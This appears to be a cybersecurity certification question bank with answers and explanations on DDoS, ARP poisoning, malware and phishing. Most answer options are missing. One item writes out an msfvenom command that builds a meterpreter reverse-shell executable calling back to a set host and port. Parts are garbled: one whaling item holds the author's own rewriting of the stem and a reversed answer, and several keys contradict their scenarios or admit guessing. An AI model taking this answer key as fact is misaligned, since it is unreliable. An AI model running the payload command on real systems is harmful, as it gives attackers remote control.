Which DDoS attack type exploits a small query to a vulnerable service that generates a large response directed at the victim?
Amplification uses reflectors to multiply traffic.
A network administrator notices that the ARP cache on several workstations contains entries mapping the default gateway IP to an unknown MAC address. Users report intermittent connectivity issues. Which tool is MOST likely being used to perform this attack?
Ettercap is specifically designed for ARP poisoning and MITM attacks.
Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)
Correct. HTTP flood sends many HTTP requests at the application layer.
SYN cookies encode connection state in the SYN-ACK, allowing the server to avoid resource allocation until the handshake completes.
Why this answer
SYN flood attacks exploit the TCP three-way handshake by sending many SYN packets without completing the handshake. SYN cookies allow the server to avoid storing half-open connections, effectively mitigating SYN floods.
Which TWO of the following are characteristics of a polymorphic virus? (Select 2)
Correct. Polymorphic viruses mutate their code.
Why this answer
Polymorphic viruses change their code signature each time they replicate, making detection difficult. They often use encryption to hide malicious code.
Which THREE of the following are techniques used in session hijacking?
MITM attacks allow the attacker to intercept and manipulate session data.
Why this answer
Man-in-the-middle (MITM) interception is a core session hijacking technique where the attacker positions themselves between the client and server to intercept and manipulate traffic. By capturing session tokens or credentials in transit, the attacker can impersonate the legitimate user without needing to predict sequence numbers or steal cookies directly.
Exam trap
EC-Council often tests the distinction between attacks that directly enable session hijacking (like MITM) and attacks that are merely precursors or belong to a different category (like DNS poisoning or MAC flooding), and candidates often mistakenly select options that facilitate but do not directly perform session hijacking.
Correct. The large responses and random subdomains indicate an amplification attack.
Why this answer
A DNS amplification attack uses open DNS resolvers to send large responses to a spoofed victim IP. The random subdomains are used to generate large responses, and the outbound queries come from the internal host acting as a reflector.
Which TWO of the following are effective mitigation techniques against DDoS attacks? (Select two)
Rate limiting restricts the number of requests from a source, mitigating DDoS.
Why this answer
Rate limiting limits traffic per source, and scrubbing centers filter malicious traffic. Anycast distributes traffic, and blackholing drops traffic, but rate limiting and scrubbing are direct mitigations.
Which of the following is a tool commonly used for MAC flooding attacks to force a switch into fail-open mode, allowing sniffing of all traffic on the network?
macof is specifically designed for MAC flooding.
Why this answer
macof (part of the dsniff suite) floods a switch with many fake MAC addresses, exhausting the CAM table and causing the switch to flood traffic out all ports.
A security analyst notices that an internal server is sending a high volume of DNS queries to external servers for non-existent domains. Which type of malware behavior is MOST likely being observed?
Worms often generate network traffic, including DNS queries, as they attempt to find and infect new hosts.
Why this answer
A worm self-replicates across the network, often generating unusual DNS queries as it spreads.
A penetration tester receives an email that appears to be from the company's CEO, urgently requesting that the tester click a link to review a document. The email contains several grammatical errors and the sender's address is slightly misspelled. Which type of social engineering attack is this MOST likely?
Whaling is a form of spear phishing that targets senior executives, often with urgent requests.
Why this answer
Whaling targets high-level executives (like the CEO) with personalized phishing emails. The urgency and impersonation of a CEO are classic whaling indicators.
A security analyst detects an ongoing DDoS attack where the attacker sends a large number of ICMP echo request packets with spoofed source IP addresses to a network's broadcast address. The attack overwhelms the target with responses from all hosts on the network. Which attack type is this?
Smurf sends ICMP echo requests to a broadcast address with a spoofed source, causing amplification.
Why this answer
A Smurf attack sends ICMP echo requests to the network broadcast address with the victim's spoofed source IP, causing all hosts to reply to the victim, amplifying traffic.
Which tool is commonly used for ARP spoofing attacks to perform man-in-the-middle (MITM) attacks on a local network?
Why this answer
Ettercap is a well-known suite for ARP poisoning, enabling MITM attacks. It can intercept traffic between hosts on a switched network.
A security analyst notices that a web server is experiencing slow response times, and the connection logs show many incomplete HTTP requests from various IP addresses, each keeping connections open for long periods. Which attack is MOST likely occurring?
Slowloris sends partial HTTP headers and keeps connections open.
Why this answer
Slowloris is a low-bandwidth application-layer DoS attack that keeps many connections open by sending partial HTTP requests, exhausting server resources.
Which type of malware is designed to replicate itself across networks without requiring a host file, often exploiting vulnerabilities to spread?
Worms self-replicate without host files.
Why this answer
Worms are standalone malware that self-replicate and spread over networks.
During a penetration test, an attacker gains access to a system and wants to maintain persistent remote control. Which type of Trojan is specifically designed for this purpose?
Correct. A backdoor Trojan provides unauthorized remote access to the system.
Why this answer
A Remote Access Trojan (RAT) provides the attacker with remote control over the victim machine, often with features for persistence and stealth.
A security analyst notices that a web server is responding very slowly to legitimate requests. The server logs show many incomplete HTTP GET requests that never complete, each opened slowly over time from many different IP addresses. Which attack is most likely occurring?
Slowloris sends slow partial HTTP headers to keep connections open.
Why this answer
Slowloris is an application-layer DDoS attack that holds connections open by sending partial HTTP requests, exhausting server connection pools. It uses many sources and slow sending.
Which TWO of the following are characteristics of a polymorphic virus? (Choose 2)
Polymorphic viruses mutate to avoid detection.
Why this answer
Polymorphic viruses change their code signature each time they replicate, using mutation engines to evade signature detection.
Which tool is specifically designed to automate social engineering attacks, such as phishing and credential harvesting?
SET is the Social Engineering Toolkit, designed for automating social engineering attacks.
Why this answer
The Social Engineering Toolkit (SET) is a well-known framework for automating social engineering attacks.
A security analyst notices that a server is sending an unusually high number of SYN packets to multiple external hosts, but the connections are never completed. The server is most likely involved in which type of attack?
Correct. A SYN flood sends many SYN packets with no final ACK, overwhelming the target.
Why this answer
A SYN flood sends many SYN packets without completing the handshake, exhausting target resources. The attacker's server is the source, indicating it is being used to launch the attack.
After a security incident, an analyst retrieves a suspicious file. The analyst runs the 'strings' command on it and sees references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique does this indicate?
CreateRemoteThread and WriteProcessMemory are used to inject code into a remote process.
Why this answer
These Windows API functions are commonly used for process injection, where code is written into another process's memory and executed. This is a common malware technique to evade detection.
Which TWO of the following are examples of application layer DDoS attacks? (Select two.)
Correct. Slowloris keeps many connections open to exhaust server resources.
Why this answer
Slowloris and HTTP flood are application layer attacks that target web servers by exhausting connections or sending high volumes of HTTP requests.
Which THREE of the following are techniques used in session hijacking? (Select three.)
Correct. ARP poisoning enables MITM, which can be used to hijack sessions.
Which of the following tools is specifically designed for ARP poisoning and can be used to perform man-in-the-middle attacks on a local network?
Why this answer
Ettercap is a comprehensive suite for man-in-the-middle attacks on a LAN, featuring ARP poisoning capabilities. Wireshark is a packet analyzer, Nmap is a network scanner, and Metasploit is an exploitation framework.
Which of the following is a characteristic of a polymorphic virus?
Correct. Polymorphic viruses mutate their code to avoid signature-based detection.
Why this answer
Polymorphic viruses change their code signature each time they replicate, making signature-based detection difficult.
Which TWO of the following are examples of application-layer DDoS attacks?
Slowloris keeps many connections open by sending partial HTTP requests.
A security analyst executes the command 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe' and transfers the file to a target. Which technique is being used?
The payload is a backdoor that allows remote control, characteristic of a Trojan.
Why this answer
Msfvenom generates a payload. The payload 'windows/meterpreter/reverse_tcp' creates a reverse shell that connects back to the attacker's IP and port. This is a classic Trojan/backdoor, specifically a remote access Trojan (RAT).
During a penetration test, a security analyst captures network traffic and observes a series of ARP replies without corresponding ARP requests. An internal host's IP address is suddenly associated with two different MAC addresses. Which attack is MOST likely occurring?
ARP poisoning sends unsolicited ARP replies to map an IP to a different MAC, enabling MITM.
Why this answer
ARP poisoning (also known as ARP spoofing) involves sending forged ARP replies to associate an IP with a different MAC, enabling MITM attacks. The other options do not fit the ARP reply pattern.
A security analyst observes a sudden increase in network traffic from many external IPs targeting the company's web server with multiple HTTP GET requests to the same page (/index.php?page=home). The requests appear legitimate but are coming at a very high rate. Which TWO types of attack is the analyst most likely witnessing?
HTTP GET requests targeting a specific page are an application-layer attack.
A security analyst receives an alert about a workstation repeatedly sending large volumes of ICMP echo request packets to a broadcast address. Which type of attack is this indicative of?
ICMP echo requests sent to a broadcast address with a spoofed source IP are the signature of a Smurf attack.
Why this answer
A Smurf attack uses ICMP echo requests to a broadcast address, causing all hosts to reply and flood the victim.
Which TWO of the following are types of malware that specifically aim to demand payment from victims?
Scareware displays fake alerts to trick users into paying for removal.
Why this answer
Ransomware encrypts files and demands ransom; scareware tricks users into paying for fake threats.
Which type of malware spreads by replicating itself across a network without requiring a host file to attach to?
Worms self-propagate across networks independently.
Why this answer
Worms are standalone malware that self-replicate and spread across networks. Viruses require a host file, Trojans disguise as legitimate software, and ransomware focuses on encryption.
Which of the following tools is commonly used for dynamic malware analysis by executing the malware in an isolated environment and monitoring system changes?
Cuckoo Sandbox is a dynamic analysis tool that executes malware in a sandbox and monitors behavior.
Why this answer
Cuckoo Sandbox is a popular open-source automated malware analysis system that runs samples in an isolated environment and reports behavior.
Which type of malware encrypts the victim's files and demands payment for the decryption key?
Correct. Ransomware encrypts files and demands ransom.
Why this answer
Ransomware is designed to encrypt files and demand ransom for the decryption key.
During a penetration test, you discover a process named 'svch0st.exe' running on a Windows server with high CPU usage. The file is not digitally signed. Which type of malware is MOST likely present?
The process masquerades as a legitimate service (svchost.exe) to avoid detection, typical of a Trojan or backdoor.
Why this answer
The name 'svch0st.exe' mimics 'svchost.exe', a legitimate Windows process. Such masquerading is common with Trojans and backdoors. The absence of a digital signature and high CPU usage suggests malicious activity.
A Trojan or backdoor is most likely.
A security analyst uses a tool to capture packets in promiscuous mode on a network segment. The analyst notices that only traffic to and from the analyst's machine is captured, not all traffic on the segment. What is the most likely reason?
Switches send frames only to the specific port, making sniffing difficult without additional techniques.
Why this answer
A switch only forwards traffic to the port where the destination MAC resides; promiscuous mode only affects the local NIC, not switch behavior.
Which TWO of the following are examples of protocol-based DoS attacks? (Choose two.)
Smurf attack uses ICMP echo requests with spoofed source IP.
Why this answer
SYN flood and Smurf attack exploit TCP/IP protocol weaknesses.
An employee receives a text message claiming to be from the company's IT department, stating that their account will be suspended unless they click a link to verify their credentials. Which type of social engineering attack is this?
SMiShing is phishing via SMS.
Why this answer
SMiShing (SMS phishing) is a phishing attack conducted via SMS text messages. The message uses urgency to trick the recipient into revealing credentials.
Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?
Ransomware encrypts files and demands payment for decryption.
Why this answer
Ransomware is specifically designed to encrypt files and demand ransom. The other options do not typically encrypt files for ransom.
Which tool is specifically designed to create and manage phishing campaigns for security awareness testing?
SET is the Social Engineering Toolkit.
Why this answer
The Social Engineering Toolkit (SET) is a framework for social engineering attacks, including phishing.
An attacker sends an email that appears to come from the CEO, requesting that the recipient urgently transfer funds to a specified account. Which type of social engineering attack is this?
Whaling targets high-profile executives like the CFO, often with CEO impersonation.
Why this answer
Whaling targets high-profile individuals like executives. Spear phishing targets specific individuals, but whaling is specifically aimed at whales (big fish). The email from the CEO targeting an employee would be spear phishing, but the term 'whaling' is used when the target is a high-level executive.
However, the email is from the CEO, so the attacker is impersonating a whale. Actually, whaling is when the target is a whale. Here the target is not necessarily a whale.
The best answer is 'Spear phishing' because it's targeted. But the question says 'appears to come from the CEO' – that's impersonation. 'Pretexting' involves fabricating a scenario. 'Phishing' is generic. 'Spear phishing' is targeted. I'll go with 'Spear phishing' as the most accurate.
I'll correct the scenario: An attacker sends an email to a CFO appearing to be from the CEO. That's whaling. Let me adjust the stem to make it clear: 'An attacker sends an email to the company CFO that appears to come from the CEO, requesting an urgent wire transfer.
Which type of social engineering attack is this?' Then the answer is 'Whaling'.
A network administrator notices an unusual amount of traffic on port 389 from an internal server to multiple external IP addresses. Which type of malware might be present?
A backdoor Trojan may use LDAP for covert communication.
Why this answer
Port 389 is used by LDAP. Outbound traffic to multiple external IPs could indicate LDAP query-based command and control or data exfiltration, but more commonly port 389 is associated with directory services. However, in a malware context, it could be a sign of a backdoor or RAT using LDAP for C2.
The most likely explanation is that the malware is using LDAP for communication, but given the options, a Trojan backdoor is plausible.
Which TWO types of malware typically require user interaction (e.g., opening a file or clicking a link) to activate? (Select two.)
Such malware is often delivered via phishing links or attachments that require user interaction.
Why this answer
Trojans typically require user interaction to execute, and ransomware often requires user action (clicking a link or opening an attachment) to trigger. Worms and polymorphic viruses can spread without user interaction, though viruses generally need a host file.
Which THREE of the following are indicators that a system may be infected with a backdoor Trojan? (Select three)
Backdoors often use ports such as 4444 and 1337 for communication.
Why this answer
Backdoor Trojans often cause unusual network connections to unknown IPs, unexpected outbound traffic, and unauthorized processes running. High CPU usage alone could be other malware, but combined with network activity it's indicative.
Which THREE of the following are techniques used in static malware analysis? (Select 3)
This is static analysis.
Why this answer
Static analysis examines the binary without execution. Inspecting file metadata, searching for suspicious strings, and analyzing the file's structure (e.g., using PEiD) are static techniques. Monitoring registry changes and network connections require execution (dynamic analysis).
Which THREE of the following are effective DDoS mitigation techniques? (Choose 3)
Dedicated infrastructure filters out attack traffic.
Why this answer
Rate limiting restricts traffic per source, scrubbing centers filter malicious traffic, and anycast disperses traffic across multiple nodes to absorb attacks.
Multiple sources sending ICMP echo requests with spoofed IPs is a classic ICMP flood, a volumetric DoS.
Why this answer
A distributed ICMP flood (ping flood) uses multiple sources to overwhelm a target with ICMP echo requests. Spoofed source addresses and varying packet sizes are common characteristics.
Attackers send small queries with spoofed source IP to open DNS resolvers, which reply with large responses to the victim.
Which tool would an analyst use to capture packets from a network interface and later analyze the pcap file for signs of an attack?
Wireshark captures and analyzes packets.
Why this answer
Wireshark is the standard tool for capturing and analyzing network packets in pcap format.
Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?
Ransomware encrypts files and demands ransom.
Why this answer
Ransomware encrypts files and demands ransom, typically in cryptocurrency.
Which TWO of the following are techniques used in session hijacking attacks? (Choose two.)
Attackers can predict sequence numbers to hijack a TCP session.
Why this answer
TCP sequence prediction is a core technique in session hijacking where an attacker predicts or sniffs the TCP sequence numbers used by the client and server to inject forged packets and take over an established TCP session. By correctly guessing the next sequence number, the attacker can spoof the client's IP address and send malicious commands that the server accepts as legitimate traffic.
Which THREE of the following are characteristics of a DNS amplification DDoS attack? (Select three.)
Queries are sent with the victim's IP as the source so that responses go to the victim.
Why this answer
DNS amplification uses open DNS resolvers, spoofs the victim's IP, and exploits small queries to generate large responses, thereby amplifying traffic.
Which type of malware is characterized by being able to change its code signature each time it replicates to evade signature-based detection?
Polymorphic viruses change their code to evade signature detection.
Why this answer
Polymorphic viruses change their code signature (using mutation engines) each replication to avoid detection.
Which TWO of the following are examples of amplification attacks used in DDoS?
DNS amplification uses small queries to generate large responses.
Which of the following malware types is characterized by self-replication without requiring a host file or program, and spreading across networks automatically?
Worms are self-replicating and spread automatically.
Why this answer
Worms are standalone self-replicating malware that spread across networks without needing to attach to host files.
An analyst observes that a web server is receiving many HTTP GET requests with random parameter values, each request taking a long time to complete. The server's connection pool is exhausted, and legitimate users cannot access the site. Which attack is MOST likely occurring?
Slowloris sends incomplete HTTP requests to keep connections open, exhausting the connection pool.
Why this answer
Slowloris sends partial HTTP requests to keep connections open, exhausting the server's connection pool.
An organization wants to mitigate the impact of a DDoS attack by distributing incoming traffic across multiple servers in different geographic locations. Which technique is BEST suited?
Anycast distributes traffic across multiple nodes based on routing protocols.
Why this answer
Anycast routing allows traffic to be directed to the nearest or best-performing server among multiple locations, helping absorb DDoS traffic.
An organization wants to protect against DNS spoofing attacks. Which security measure is MOST effective in preventing an attacker from poisoning DNS cache entries?
DNSSEC validates DNS responses.
Why this answer
DNSSEC adds cryptographic signatures to DNS data, preventing spoofed responses.
Which THREE of the following are effective DDoS mitigation techniques? (Select 3)
Why this answer
Rate limiting restricts traffic volume, scrubbing centers filter malicious traffic, and anycast distributes traffic across multiple servers.
A company's security team wants to deploy a DDoS mitigation technique that distributes incoming traffic across multiple servers in different geographic locations, making it harder for an attacker to overwhelm a single target. Which technique BEST fits this description?
Anycast distributes traffic to multiple locations, mitigating volumetric attacks.
Why this answer
Anycast routing allows multiple servers to share the same IP address; traffic flows to the nearest server, distributing the load and absorbing DDoS attacks.
An attacker gains physical access to a building by following an authorized employee through a secure door without using a badge. Which social engineering technique is being used?
Tailgating is physically following someone through a secure entrance.
Why this answer
Tailgating is when an unauthorized person follows an authorized individual into a restricted area without consent. It is a physical security breach.
Which type of malware is characterized by encrypting a victim's files and demanding a ransom payment for the decryption key?
Ransomware encrypts files and demands ransom.
Why this answer
Ransomware encrypts files and demands payment for decryption. Examples include CryptoLocker, WannaCry, and Locky.
A security analyst observes the following in a packet capture: a single source IP sends a large number of ICMP echo request packets to the broadcast address of a subnet, with the source IP spoofed to be the target victim. Which type of attack is being executed?
Correct. Smurf uses broadcast amplification and spoofed source IP to flood the victim.
Why this answer
A Smurf attack sends ICMP echo requests to a broadcast address with the victim's spoofed source IP, causing all hosts on the subnet to reply to the victim, overwhelming it.
An employee receives an email that appears to be from the company's CEO, requesting an urgent wire transfer to a vendor. The email address is slightly different from the CEO's actual address. Which type of social engineering attack is this?
Whaling targets senior executives with personalized attacks.
Why this answer
Whaling is a spear-phishing attack targeting senior executives, often with requests for wire transfers or sensitive information.
A security analyst notices that the ARP cache on a workstation contains multiple entries for the same IP address with different MAC addresses. Which attack is likely occurring?
ARP poisoning causes multiple MAC entries for one IP due to forged ARP replies.
Why this answer
Multiple MAC addresses for one IP in the ARP cache is a sign of ARP spoofing/poisoning, where an attacker sends forged ARP replies to associate their MAC with the victim's IP.
A security team discovers a file named 'svchost.exe' in a user's Temp folder. The file is signed by 'Microsoft Corporation' but the digital signature validation fails. Which analysis method should be used FIRST to determine if it's malicious?
Correct. Static analysis can reveal suspicious strings, packed executables, or invalid signatures without execution.
Why this answer
Static analysis (e.g., examining strings, digital signatures, PE headers) is the first step because it is safe and can quickly identify suspicious indicators without executing the file.
Which TWO of the following are types of malware analysis? (Select two.)
Correct. Static analysis reviews code and structure without execution.
Why this answer
Static analysis examines the file without executing it (e.g., examining strings, headers). Dynamic analysis executes the malware in a controlled environment (sandbox) to observe behavior.
An organization wants to mitigate the impact of a DDoS attack that uses large volumes of UDP traffic to exhaust bandwidth. Which of the following techniques would be MOST effective?
Scrubbing centers can analyze and filter out malicious UDP traffic while allowing legitimate traffic.
Why this answer
Scrubbing centers filter malicious traffic from legitimate traffic, effectively mitigating volumetric DDoS attacks.
During a penetration test, a tester discovers that the target switch's MAC address table is full, causing it to flood traffic out all ports. The tester then captures network traffic using Wireshark on the same segment. Which attack was the tester performing?
MAC flooding fills the switch's MAC address table, causing it to broadcast frames.
Why this answer
MAC flooding attacks send many fake MAC addresses to overflow the switch's MAC table, forcing it into hub mode and allowing traffic sniffing.
Which TWO tools are commonly used for ARP poisoning attacks?
Cain & Abel is a Windows tool that includes ARP poisoning capabilities.
Why this answer
Ettercap and Cain & Abel are well-known tools for ARP poisoning, allowing attackers to intercept traffic on a LAN.
Which THREE of the following are common indicators of a man-in-the-middle attack using ARP spoofing? (Choose three.)
ARP spoofing assigns the same IP to multiple MAC addresses, causing duplicates.
A security analyst notices that users receive emails from a known vendor requesting urgent payment to a new bank account. The email domain is misspelled (e.g., vvendorfake.com). Which type of social engineering is this?
Targeted emails with personalized context and spoofed domain indicate spear phishing.
Why this answer
Spear phishing targets specific individuals or organizations with personalized content. The misspelled domain and urgency are classic spear phishing indicators.
Which type of malware is characterized by modifying its own code to evade signature-based detection, often changing its appearance each time it replicates?
Polymorphic viruses change their code on each infection.
Why this answer
Polymorphic malware changes its code (but retains functionality) to avoid detection by signature-based antivirus.
An organization receives an email that appears to be from the CEO, urgently requesting that the recipient wire funds to a new vendor. The email contains the CEO's name and title but the sender address is slightly misspelled. Which type of social engineering attack is this?
Whaling targets senior executives with personalized scams.
Why this answer
Whaling targets senior executives (like the CEO) with personalized phishing emails, often involving financial fraud.
Which TWO of the following are examples of static malware analysis techniques? (Select two.)
VirusTotal uses static signatures.
Why this answer
Static analysis examines the malware without executing it. String analysis looks for embedded strings, and VirusTotal checks hashes against known signatures. Sandboxing and process monitoring are dynamic analysis.